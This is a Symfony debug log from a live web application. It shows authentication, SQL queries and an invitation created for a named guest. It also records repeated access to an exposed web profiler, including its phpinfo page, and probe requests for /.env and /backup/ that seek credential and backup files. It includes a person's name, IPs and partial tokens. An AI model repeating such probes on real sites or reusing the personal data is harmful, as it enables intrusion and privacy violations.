[2025-12-16 20:16:47] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:47] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-16 20:16:47] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:47] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:47] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [259,1] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [259,1] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [459] []
[2025-12-16 20:16:47] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 20:17:22] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-16 20:17:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 20:17:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:17:22] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:17:22] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-16 20:17:22] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:17:22] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:17:22] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [458,259,1] []
[2025-12-16 20:17:22] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 20:17:22] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"d6dfc6a6-e678-411a-ac07-4c [...]","2":1,"3":"2025-12-16 20:17:22","4":"2025-12-16 20:17:22","5":"Evelin Del Carmen","6":"Lara Amendola","7":"726513","8":"/invitation/bec8ddc166ea3d [...]","9":1,"10":null,"11":"2025-12-16 21:00:00","12":null,"13":null,"14":null,"15":259,"16":458} []
[2025-12-16 20:17:22] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
[2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [259] []
[2025-12-16 20:17:22] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 20:17:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"93e1f8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/93e1f8?panel=cache","method":"GET"} []
[2025-12-16 20:17:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 20:22:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 20:23:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ec2e58","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/ec2e58?panel=time","method":"GET"} []
[2025-12-16 20:23:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 20:29:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0?panel=config","method":"GET"} []
[2025-12-16 20:29:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 20:35:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4c7627","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4c7627?panel=cache","method":"GET"} []
[2025-12-16 20:35:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 20:38:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 20:38:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-16 20:40:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"25a5c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/25a5c3?panel=config","method":"GET"} []
[2025-12-16 20:40:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 20:45:05] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"502c46","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/502c46/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-16 20:45:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-16 20:46:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80?panel=config","method":"GET"} []
[2025-12-16 20:46:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 20:51:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50512a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/50512a?panel=security","method":"GET"} []
[2025-12-16 20:51:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 20:52:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465a2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/465a2b","method":"GET"} []
[2025-12-16 20:52:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 20:57:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50512a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/50512a?panel=config","method":"GET"} []
[2025-12-16 20:57:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 21:02:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2c77cb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2c77cb?panel=security","method":"GET"} []
[2025-12-16 21:02:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 21:04:25] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://unda.co/_profiler/search?limit=10","method":"GET"} []
[2025-12-16 21:04:28] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e21315","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/e21315/search/results?limit=10","method":"GET"} []
[2025-12-16 21:04:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-16 21:05:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 21:08:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2ea4ae","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2ea4ae?panel=config","method":"GET"} []
[2025-12-16 21:08:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 21:14:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2ea4ae","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2ea4ae","method":"GET"} []
[2025-12-16 21:14:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 21:15:52] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-16 21:18:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"486bc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/486bc0?panel=config","method":"GET"} []
[2025-12-16 21:18:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 21:23:08] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 21:25:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 21:29:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8","method":"GET"} []
[2025-12-16 21:29:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 21:33:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=dump","method":"GET"} []
[2025-12-16 21:33:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 21:36:14] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"d669c6","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/d669c6/search/results?ip=66.249.77.38&limit=10&method=GET","method":"GET"} []
[2025-12-16 21:36:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.77.38&limit=10&method=GET","method":"GET"} []
[2025-12-16 21:37:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ec2e58","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/ec2e58?panel=twig","method":"GET"} []
[2025-12-16 21:37:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 21:38:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=logger","method":"GET"} []
[2025-12-16 21:38:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 21:39:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"153cba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/153cba?panel=router","method":"GET"} []
[2025-12-16 21:39:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-16 21:43:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80?panel=security","method":"GET"} []
[2025-12-16 21:43:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 21:44:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5235dc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5235dc?panel=cache","method":"GET"} []
[2025-12-16 21:44:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 21:49:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80?panel=cache","method":"GET"} []
[2025-12-16 21:49:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 21:51:43] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 21:53:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=validator","method":"GET"} []
[2025-12-16 21:53:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-16 21:54:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"36d0fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/36d0fa/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-16 21:54:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-16 21:56:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50512a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/50512a?panel=cache","method":"GET"} []
[2025-12-16 21:56:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 22:02:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=time","method":"GET"} []
